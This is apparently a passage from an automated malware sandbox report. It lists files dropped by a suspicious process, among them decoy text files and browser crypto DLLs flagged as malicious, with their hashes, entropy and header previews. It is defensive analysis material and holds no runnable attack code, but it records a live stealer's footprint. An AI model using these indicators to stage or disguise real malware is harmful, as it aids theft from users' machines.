Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\WKXEWIOTXI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697336881644685
Encrypted:	false
SSDEEP:	24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
MD5:	08AF516B9E451DB9845289801A21F1BC
SHA1:	D43E58D334ACFAE831AD929003D89DC6D3B499F9
SHA-256:	C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
SHA-512:	C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
Malicious:	false
Preview:	WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL

C:\ProgramData\WKXEWIOTXI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697336881644685
Encrypted:	false
SSDEEP:	24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
MD5:	08AF516B9E451DB9845289801A21F1BC
SHA1:	D43E58D334ACFAE831AD929003D89DC6D3B499F9
SHA-256:	C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
SHA-512:	C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
Malicious:	false
Preview:	WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL

C:\ProgramData\YPSIACHYXW.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: g77dRQ1Csm.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: mJVVW85CnW.exe, Detection: malicious, Browse Filename: Vk2yYa9dHl.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\iolo technologies\logs\bootstrap.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	331
Entropy (8bit):	5.212608210188853
Encrypted:	false
SSDEEP:	6:BMKLwF5qtaAgrCYNF5HmLIYvgBtXQDF5QHB1JC2S2fI0XY4eA:f45QaXCYb5HmkYvgLXm52/Su73
MD5:	5962C7F677E4722523DEA5CCB3B63121
SHA1:	D4A9981FA8CA8F7AAA7E598F4EDD991AF3C99E19
SHA-256:	CFEFD57EFE67CBA1FEF4B8F63D19B15FF8DB904B22F6C5DBB5BAF893E74D388A
SHA-512:	F528291F23AF935C90C15FD84586C3944AA8201C7B16A0B3AB4FBDEEB78A4AF720EF02969716D72BC8AC599668682A5B7E31F572E18DBA37171EE9D5CBAFA0FB
Malicious:	false
Preview:	Bootstrap LogFile..-----------------..[25/04/2024 12:16:47]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[25/04/2024 12:16:47]: This Brand IOLODEFAULT Not Detected As Installed..[25/04/2024 12:16:47]: No Supported Products Were Detected On This System..[25/04/2024 12:17:31]: Telemetry Data Sent..

C:\ProgramData\iolo\logs\WSComm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.235316399970441
Encrypted:	false
SSDEEP:	6:q8jFMS0TCfk3VotGjZb34L8jFMGE/Qilo4jFsS0TCfk3VotGjZb34L8jFsGE/Qit:ljFM9TXVotgOL8jFMGri/jFs9TXVotg0
MD5:	54FEB240BA68CC73091D5766B4C2A688
SHA1:	A294236E926D8542532B8B95982C16F40A31ADAF
SHA-256:	6286DB872EB399F9B946CA83807AA6F27017DAAFFE993E1652930513028C5C70
SHA-512:	08F04808D9DCF67204FBDAD8141BA60881B1A6546E87609450F9D6BA2E64DC49EC6F7B6BC616B9F1A9C9B84DC17786A7A5DF8D50AA5A87D96DF7E1A5982F51E2
Malicious:	false
Preview:	[04/25/24 12:16:18] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/25/24 12:16:18] IsValidCommunication : Result := True...[04/25/24 12:16:36] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/25/24 12:16:36] IsValidCommunication : Result := True...

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: g77dRQ1Csm.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: mJVVW85CnW.exe, Detection: malicious, Browse Filename: Vk2yYa9dHl.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\ApplicationInsights\02b7d1436f6e86786e74c7f14b0eeb043810a2ded0b85707d2c8e2ec408053fe\wb2oigpz.xj2

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
MD5:	812F0A8C671812AA613FC139B69E8614
SHA1:	B4177437C50B25B06FB885362DA36FD171A1C5A9
SHA-256:	6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
SHA-512:	6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
